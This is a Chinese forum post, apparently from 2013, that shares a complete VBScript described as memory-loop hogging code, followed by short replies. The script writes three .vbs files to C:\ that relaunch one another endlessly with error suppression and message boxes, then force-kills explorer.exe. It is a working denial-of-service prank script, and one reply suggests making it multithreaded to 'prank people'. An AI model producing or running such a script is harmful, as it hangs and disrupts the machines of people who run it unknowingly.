银冥币
VBS内存循环占用代码

---------------------------代码开始---------------------------

Set a = CreateObject("scripting.filesystemobject")

Set b = a.createtextfile("C:\Rmb1.vbs")

b.writeline ("On Error Resume Next")

b.writeline ("set wshshell=createobject"+"("+chr(34)+"wscript.shell"+chr(34)+")")

b.writeline ("d=wshshell.run ("+chr(34)+"C:\Rmb2.vbs"+chr(34)+")")

b.writeline ("d=wshshell.run ("+chr(34)+"C:\Rmb3.vbs"+chr(34)+")")

b.writeline ("msgbox("+chr(34)+"无限的循环--RMB"+chr(34)+")")

b.Close

Set a = CreateObject("scripting.filesystemobject")

Set b = a.createtextfile("C:\Rmb2.vbs")

b.writeline ("On Error Resume Next")

b.writeline ("set wshshell=createobject"+"("+chr(34)+"wscript.shell"+chr(34)+")")

b.writeline ("d=wshshell.run ("+chr(34)+"C:\Rmb1.vbs"+chr(34)+")")

b.writeline ("d=wshshell.run ("+chr(34)+"C:\Rmb3.vbs"+chr(34)+")")

b.writeline ("msgbox("+chr(34)+"无限的循环--RMB"+chr(34)+")")

b.Close

Set a = CreateObject("scripting.filesystemobject")

Set b = a.createtextfile("C:\Rmb3.vbs")

b.writeline ("On Error Resume Next")

b.writeline ("set wshshell=createobject"+"("+chr(34)+"wscript.shell"+chr(34)+")")

b.writeline ("d=wshshell.run ("+chr(34)+"C:\Rmb2.vbs"+chr(34)+")")

b.writeline ("d=wshshell.run ("+chr(34)+"C:\Rmb1.vbs"+chr(34)+")")

b.writeline ("msgbox("+chr(34)+"无限的循环--RMB"+chr(34)+")")

b.Close

On Error Resume Next

set wshshell=createobject("wscript.shell")

d=wshshell.run ("C:\Rmb1.vbs")

d=wshshell.run ("taskkill /f /im explorer.exe")

---------------------------代码结束---------------------------

很久以前写的,后来一直丢在那里。。。。

该贴已经同步到 银冥币的微博

IBT
能不能讲一下效果
展开Biu

lz能不能讲一下效果,以及破解方法啊

[查看全文]
银冥币
改一些地方弄成多線程
展开Biu

katetem 发表于 2013-8-11 17:27

改一些地方弄成多線程 拿來整人 哈

泥垢。。

[查看全文]
katetem
改一些地方
展开Biu

改一些地方弄成多線程 拿來整人 哈

[查看全文]
困困困。
看的不是很懂
展开Biu

#im看的不是很懂 循环写文件

[查看全文]